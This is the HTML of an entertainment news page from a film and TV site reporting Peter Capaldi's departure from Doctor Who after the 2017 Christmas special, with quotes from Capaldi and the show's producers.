<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-74081"><a href="http://moviehole.net/tag/vod">VOD Views</a></li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
                <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form method="get" class="td-search-form" action="http://moviehole.net/">
				<div role="search" class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-112380" class="post-112380 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-tv-2 tag-doctor-who tag-tv-2" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="http://moviehole.net/category/news">Movie News</a></li><li class="entry-category"><a  href="http://moviehole.net/category/tv-2">TV</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">Peter Capaldi is leaving <i>Doctor Who</i></h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name">By <a href="http://moviehole.net/author/tawnee">Tawnee TV</a> - </div>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-01-31T10:04:09+00:00" >Jan 31, 2017</time></span>                                        <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-112380">14</span></div>                </div>

            </header>

        </div>

        

        <div class="td-post-content">

        <div class="td-post-featured-image"><img width="620" height="400" class="entry-thumb" src="http://moviehole.net/img/drwho2.jpg" alt="" title="drwho"/></div>
        <div class="copy-paste-block">
<p>Peter Capaldi has announced he&#8217;ll be stepping down as Doctor Who in twelve months.</p>

 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_inlineright">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8634979609"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8634979609"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:200px;height:200px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8634979609"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8634979609"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<p>Capaldi first stepped into the TARDIS in 2013, and will leave the iconic role in the 2017 Christmas special after three incredible seasons on BBC AMERICA&#8217;s hit sci-fi drama.</p>
<p>The announcement came tonight on Jo Whiley&#8217;s BBC Radio 2 show; speaking about the upcoming series this Spring he exclusively revealed the next season of the world&#8217;s longest running sci-fi show will be his last.</p>
<p>Peter Capaldi said: &#8220;One of the greatest privileges of being Doctor Who is to see the world at its best. From our brilliant crew and creative team working for the best broadcaster on the planet, to the viewers and fans whose endless creativity, generosity and inclusiveness points to a brighter future ahead. I can&#8217;t thank everyone enough. It&#8217;s been cosmic.&#8221;</p>
<p>Capaldi was unveiled to the nation as the Twelfth Doctor during a special live television event on BBC One. Peter&#8217;s Time Lord has been much loved and critically acclaimed, with season nine featuring some of the best reviewed performances and episodes of recent series. In particular, his anti-war speech in &#8216;The Zygon Inversion,&#8217; and his solo appearance in the one-hander, &#8216;Heaven Sent,&#8217; have been widely acclaimed as among the finest performances by anyone in the role of the Doctor. Under his reign the show has expanded globally. He took the series on a World Tour and has drawn record ratings in America, Canada, and Latin America. The highly anticipated 10th season returns to BBC AMERICA Saturday, April 15th at 9/8c.</p>
<p>Peter Capaldi&#8217;s final series also marks writer and executive producer Steven Moffat&#8217;s last so promises to be unmissable event television.</p>
<p>Steven Moffat, writer and executive producer said: &#8220;For years before I ever imagined being involved in Doctor Who, or had ever met the man, I wanted to work with Peter Capaldi. I could not have imagined that one day we&#8217;d be standing on the TARDIS together. Like Peter, I&#8217;m facing up to leaving the best job I&#8217;ll ever have, but knowing I do so in the company of the best, and kindest and cleverest of men, makes the saddest of endings a little sweeter. But hey, it&#8217;s a long way from over. Peters&#8217; amazing, fiery, turbulent Doctor is still fighting the good fight, and his greatest adventures are yet to come. Monsters of the universe, be on your guard &#8211; Capaldi&#8217;s not done with you yet!&#8221;</p>
<p>Peter will be joined in season 10 by new companion Pearl Mackie (Bill), and Matt Lucas (Nardole) with guest appearances to come from David Suchet and Michelle Gomez. He has starred alongside Jenna Coleman as his companion Clara Oswald, Alex Kingston as River Song, Ingrid Oliver as Osgood, as well as Keeley Hawes, Tom Riley, Frank Skinner, Maisie Williams, Joivan Wade and many more. Peter&#8217;s Doctor has fought Daleks and Davros, Cybermen, Zygons, new monsters like the Veil and old foes the Time Lords.</p>
<p>Brian Minchin, Executive Producer said: &#8220;Peter Capaldi is an extraordinary Doctor and has taken the show to amazing places. Although I&#8217;m sad he has decided to move on in 2018, I&#8217;m delighted that we have one final series with Peter Capaldi and Steven Moffat. I know what they&#8217;re planning and it&#8217;s going to be incredible.&#8221;</p>
<p>Capaldi will return in the next season for 12 episodes in April, followed by the Christmas Special when the regeneration will take place.</p>
<p>He replaced Matt Smith as the Twelfth Doctor. He first appeared in &#8220;Doctor Who&#8221; in 2008, playing Caecilius in the episode &#8220;The Fires of Pompeii.&#8221;</p>
<p>BBC AMERICA&#8217;s new &#8220;Doctor Who&#8221; spin-off, &#8220;Class&#8221;, comes from award-winning YA writer and executive producer, Patrick Ness (&#8220;A Monster Calls&#8221;), and is executive produced by Moffat and Minchin.</p>
<p>Following the season 10 premiere, the new eight-part series will follow four Coal Hill School students who have hidden secrets and desires, navigate a life of friends, parents, school work, sex, sorrow &#8211; and possibly the end of existence. Coal Hill School has been a part of the Doctor Who universe since the very beginning, but that has come at a price. Time travelling over the years has caused the very walls of space and time to become thin. There&#8217;s something pressing in on the other side, something waiting for its chance to kill everyone and everything, to bring us all into Shadow.</p>
</div>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-112380" class="share-twitter sd-button share-icon no-text" href="http://moviehole.net/2017112380peter-capaldi-leaving-doctor?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-112380" class="share-facebook sd-button share-icon no-text" href="http://moviehole.net/2017112380peter-capaldi-leaving-doctor?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-112380" class="share-google-plus-1 sd-button share-icon no-text" href="http://moviehole.net/2017112380peter-capaldi-leaving-doctor?share=google-plus-1" target="_blank" title="Click to share on Google+"><span></span><span class="sharing-screen-reader-text">Click to share on Google+ (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                <ul class="td-tags td-post-small-box clearfix"><li><span>TAGS</span></li><li><a href="http://moviehole.net/tag/doctor-who">Doctor Who</a></li><li><a href="http://moviehole.net/tag/tv-2">TV</a></li></ul>            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fmoviehole.net%2F2017112380peter-capaldi-leaving-doctor" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Peter+Capaldi+is+leaving+%3Ci%3EDoctor+Who%3C%2Fi%3E&url=http%3A%2F%2Fmoviehole.net%2F2017112380peter-capaldi-leaving-doctor&via=moviehole"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://moviehole.net/2017112380peter-capaldi-leaving-doctor" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://moviehole.net/2017112380peter-capaldi-leaving-doctor&amp;media=http://moviehole.net/img/drwho2.jpg&description=Peter+Capaldi+is+leaving+%3Ci%3EDoctor+Who%3C%2Fi%3E" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Peter+Capaldi+is+leaving+%3Ci%3EDoctor+Who%3C%2Fi%3E%20-%20http%3A%2F%2Fmoviehole.net%2F2017112380peter-capaldi-leaving-doctor" ><i class="td-icon-whatsapp"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://moviehole.net/2017112380peter-capaldi-leaving-doctor&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://moviehole.net/2017112380peter-capaldi-leaving-doctor" data-text="Peter Capaldi is leaving <i>Doctor Who</i>" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="http://moviehole.net/2017112370holt-joseph-marvels-cloak-dagger">Holt &#038; Joseph are Marvel&#8217;s <i>Cloak and Dagger</i></a></div></div><div class="td-next-prev-separator"></div></div>            <div class="author-box-wrap"><a href="http://moviehole.net/author/tawnee"><img src="http://moviehole.net/img/TAWNE-150x150.jpg" width="96" height="96" alt="Tawnee TV" class="avatar avatar-96 wp-user-avatar wp-user-avatar-96 alignnone photo" /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="http://moviehole.net/author/tawnee">Tawnee TV</a></span></div><div class="td-author-description">Is a big believer in getting as much exercise in the fresh air as one can - which is why Tawnee always connects the TV to an extension chord so she can strenuously lug the set into the yard on nice days.</div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Tawnee TV"></span><meta itemprop="datePublished" content="2017-01-31T10:04:09+00:00"><meta itemprop="dateModified" content="2017-01-31T10:04:09+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://moviehole.net/2017112380peter-capaldi-leaving-doctor"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://moviehole.net/img/logomoviehole-700x295.png"></span><meta itemprop="name" content="Moviehole"></span><meta itemprop="headline " content="Peter Capaldi is leaving &lt;i&gt;Doctor Who&lt;/i&gt;"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://moviehole.net/img/drwho2.jpg"><meta itemprop="width" content="620"><meta itemprop="height" content="400"></span>        </footer>

    </article> <!-- /.post -->

    <script>var block_td_uid_1_58906228402de = new tdBlock();
block_td_uid_1_58906228402de.id = "td_uid_1_58906228402de";
block_td_uid_1_58906228402de.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_1_58906228402de_rand","offset":"","live_filter":"cur_post_same_tags","live_filter_cur_post_id":112380,"live_filter_cur_post_author":"132"}';
block_td_uid_1_58906228402de.td_column_number = "3";
block_td_uid_1_58906228402de.block_type = "td_block_related_posts";
block_td_uid_1_58906228402de.post_count = "3";
block_td_uid_1_58906228402de.found_posts = "1167";
block_td_uid_1_58906228402de.header_color = "";
block_td_uid_1_58906228402de.ajax_pagination_infinite_stop = "";
block_td_uid_1_58906228402de.max_num_pages = "389";
tdBlocksArray.push(block_td_uid_1_58906228402de);
</script><div class="td_block_wrap td_block_related_posts td_uid_1_58906228402de_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_1_58906228402de" ><h4 class="td-related-title"><a id="td_uid_2_58906228456f3" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_1_58906228402de" href="#">RELATED ARTICLES</a><a id="td_uid_3_5890622845763" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_1_58906228402de" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_1_58906228402de class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112370holt-joseph-marvels-cloak-dagger" rel="bookmark" title="Holt &#038; Joseph are Marvel&#8217;s Cloak and Dagger"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/cloakdagger-218x150.jpg" alt="" title="Holt &#038; Joseph are Marvel&#8217;s Cloak and Dagger"/></a></div>                <a href="http://moviehole.net/category/news" class="td-post-category">Movie News</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112370holt-joseph-marvels-cloak-dagger" rel="bookmark" title="Holt &#038; Joseph are Marvel&#8217;s Cloak and Dagger">Holt &#038; Joseph are Marvel&#8217;s Cloak and Dagger</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112330amazon-reveals-patriot-premiere-date-new-images" rel="bookmark" title="Amazon reveals Patriot premiere date &#038; new images"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/patriot-patriot_102_04552-1-fnl-lg_rgb-218x150.jpg" alt="" title="Amazon reveals Patriot premiere date &#038; new images"/></a></div>                <a href="http://moviehole.net/category/news" class="td-post-category">Movie News</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112330amazon-reveals-patriot-premiere-date-new-images" rel="bookmark" title="Amazon reveals Patriot premiere date &#038; new images">Amazon reveals Patriot premiere date &#038; new images</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112324fox-orders-vampire-drama-passage" rel="bookmark" title="Fox orders vampire drama The Passage"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/The-Passage-218x150.jpg" alt="" title="Fox orders vampire drama The Passage"/></a></div>                <a href="http://moviehole.net/category/news" class="td-post-category">Movie News</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112324fox-orders-vampire-drama-passage" rel="bookmark" title="Fox orders vampire drama The Passage">Fox orders vampire drama The Passage</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_58906228402de" data-td_block_id="td_uid_1_58906228402de"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_58906228402de" data-td_block_id="td_uid_1_58906228402de"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->

	<div class="comments" id="comments">
            </div> <!-- /.content -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-sidebar">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:200px;height:200px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 


<style scoped>
.td_uid_4_589062284ab03_rand .td_module_wrap:hover .entry-title a,
            .td_uid_4_589062284ab03_rand a.td-pulldown-filter-link:hover,
            .td_uid_4_589062284ab03_rand .td-subcat-item a:hover,
            .td_uid_4_589062284ab03_rand .td-subcat-item .td-cur-simple-item,
            .td_uid_4_589062284ab03_rand .td_quote_on_blocks,
            .td_uid_4_589062284ab03_rand .td-opacity-cat .td-post-category:hover,
            .td_uid_4_589062284ab03_rand .td-opacity-read .td-read-more a:hover,
            .td_uid_4_589062284ab03_rand .td-opacity-author .td-post-author-name a:hover,
            .td_uid_4_589062284ab03_rand .td-instagram-user a {
                color: #2f51b4;
            }

            .td_uid_4_589062284ab03_rand .td-next-prev-wrap a:hover,
            .td_uid_4_589062284ab03_rand .td-load-more-wrap a:hover {
                background-color: #2f51b4;
                border-color: #2f51b4;
            }

            .td_uid_4_589062284ab03_rand .block-title span,
            .td_uid_4_589062284ab03_rand .td-trending-now-title,
            .td_uid_4_589062284ab03_rand .block-title a,
            .td_uid_4_589062284ab03_rand .td-read-more a,
            .td_uid_4_589062284ab03_rand .td-weather-information:before,
            .td_uid_4_589062284ab03_rand .td-weather-week:before,
            .td_uid_4_589062284ab03_rand .td-subcat-dropdown:hover .td-subcat-more,
            .td_uid_4_589062284ab03_rand .td-exchange-header:before,
            .td_uid_4_589062284ab03_rand .td-post-category:hover {
                background-color: #2f51b4;
            }

            .td_uid_4_589062284ab03_rand .block-title {
                border-color: #2f51b4;
            }

            
            .td_uid_4_589062284ab03_rand .block-title span,
            .td_uid_4_589062284ab03_rand .td-trending-now-title,
            .td_uid_4_589062284ab03_rand .block-title a {
                color: #fFFFFF;
            }
</style><script>var block_td_uid_4_589062284ab03 = new tdBlock();
block_td_uid_4_589062284ab03.id = "td_uid_4_589062284ab03";
block_td_uid_4_589062284ab03.atts = '{"limit":"8","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"5767","category_ids":"","custom_title":"REVIEWS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"#2f51b4","header_text_color":"#fFFFFF","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"td_popularity_filter_fa","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_4_589062284ab03_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_4_589062284ab03.td_column_number = "1";
block_td_uid_4_589062284ab03.block_type = "td_block_15";
block_td_uid_4_589062284ab03.post_count = "8";
block_td_uid_4_589062284ab03.found_posts = "387";
block_td_uid_4_589062284ab03.header_color = "#2f51b4";
block_td_uid_4_589062284ab03.ajax_pagination_infinite_stop = "";
block_td_uid_4_589062284ab03.max_num_pages = "49";
tdBlocksArray.push(block_td_uid_4_589062284ab03);
</script><div class="td_block_wrap td_block_15 td_block_widget td_uid_4_589062284ab03_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_4_589062284ab03" ><h4 class="block-title"><span>REVIEWS</span></h4><div class="td-subcat-filter" id="td_pulldown_td_uid_4_589062284ab03"><ul class="td-subcat-list" id="td_pulldown_td_uid_4_589062284ab03_list"><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_5_58906228517c8" data-td_filter_value="" data-td_block_id="td_uid_4_589062284ab03" href="#">All</a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_6_5890622851821" data-td_filter_value="featured" data-td_block_id="td_uid_4_589062284ab03" href="#">Featured</a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_7_5890622851868" data-td_filter_value="popular" data-td_block_id="td_uid_4_589062284ab03" href="#">All time popular</a></li></ul><div class="td-subcat-dropdown"><div class="td-subcat-more" aria-haspopup="true"><span>More</span><i class="td-icon-read-down"></i></div><ul class="td-pulldown-filter-list"></ul></div></div><div id=td_uid_4_589062284ab03 class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112057patriots-day" rel="bookmark" title="Patriots Day"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/patriotsday-218x150.jpg" alt="" title="Patriots Day"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112057patriots-day" rel="bookmark" title="Patriots Day">Patriots Day</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112114century-women" rel="bookmark" title="20th Century Women"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/annette-bening-as-nic-1-770x470-218x150.jpg" alt="" title="20th Century Women"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112114century-women" rel="bookmark" title="20th Century Women">20th Century Women</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112066split" rel="bookmark" title="Split"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/splitbanner-218x150.jpg" alt="" title="Split"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112066split" rel="bookmark" title="Split">Split</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112061xxx-return-xander-cage-2" rel="bookmark" title="xXx : Return of Xander Cage"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/xxx0001-218x150.jpg" alt="" title="xXx : Return of Xander Cage"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112061xxx-return-xander-cage-2" rel="bookmark" title="xXx : Return of Xander Cage">xXx : Return of Xander Cage</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017111958live-by-night" rel="bookmark" title="Live By Night"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/lbn-07482r-218x150.jpg" alt="" title="Live By Night"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017111958live-by-night" rel="bookmark" title="Live By Night">Live By Night</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017111944moonlight" rel="bookmark" title="Moonlight"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/moonlight-1-e1484273006499-218x150.jpg" alt="" title="Moonlight"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017111944moonlight" rel="bookmark" title="Moonlight">Moonlight</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017111782hidden-figures" rel="bookmark" title="Hidden Figures"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/hiddenfigures-218x150.jpg" alt="" title="Hidden Figures"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017111782hidden-figures" rel="bookmark" title="Hidden Figures">Hidden Figures</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2016111347jackie-2" rel="bookmark" title="Jackie"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/natalie-portman-jackie-218x150.jpg" alt="" title="Jackie"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2016111347jackie-2" rel="bookmark" title="Jackie">Jackie</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_4_589062284ab03" data-td_block_id="td_uid_4_589062284ab03"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_4_589062284ab03" data-td_block_id="td_uid_4_589062284ab03"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --><div class="clearfix"></div>
<style scoped>
.td_uid_8_589062285ddb3_rand .td_module_wrap:hover .entry-title a,
            .td_uid_8_589062285ddb3_rand a.td-pulldown-filter-link:hover,
            .td_uid_8_589062285ddb3_rand .td-subcat-item a:hover,
            .td_uid_8_589062285ddb3_rand .td-subcat-item .td-cur-simple-item,
            .td_uid_8_589062285ddb3_rand .td_quote_on_blocks,
            .td_uid_8_589062285ddb3_rand .td-opacity-cat .td-post-category:hover,
            .td_uid_8_589062285ddb3_rand .td-opacity-read .td-read-more a:hover,
            .td_uid_8_589062285ddb3_rand .td-opacity-author .td-post-author-name a:hover,
            .td_uid_8_589062285ddb3_rand .td-instagram-user a {
                color: #e32020;
            }

            .td_uid_8_589062285ddb3_rand .td-next-prev-wrap a:hover,
            .td_uid_8_589062285ddb3_rand .td-load-more-wrap a:hover {
                background-color: #e32020;
                border-color: #e32020;
            }

            .td_uid_8_589062285ddb3_rand .block-title span,
            .td_uid_8_589062285ddb3_rand .td-trending-now-title,
            .td_uid_8_589062285ddb3_rand .block-title a,
            .td_uid_8_589062285ddb3_rand .td-read-more a,
            .td_uid_8_589062285ddb3_rand .td-weather-information:before,
            .td_uid_8_589062285ddb3_rand .td-weather-week:before,
            .td_uid_8_589062285ddb3_rand .td-subcat-dropdown:hover .td-subcat-more,
            .td_uid_8_589062285ddb3_rand .td-exchange-header:before,
            .td_uid_8_589062285ddb3_rand .td-post-category:hover {
                background-color: #e32020;
            }

            .td_uid_8_589062285ddb3_rand .block-title {
                border-color: #e32020;
            }

            
            .td_uid_8_589062285ddb3_rand .block-title span,
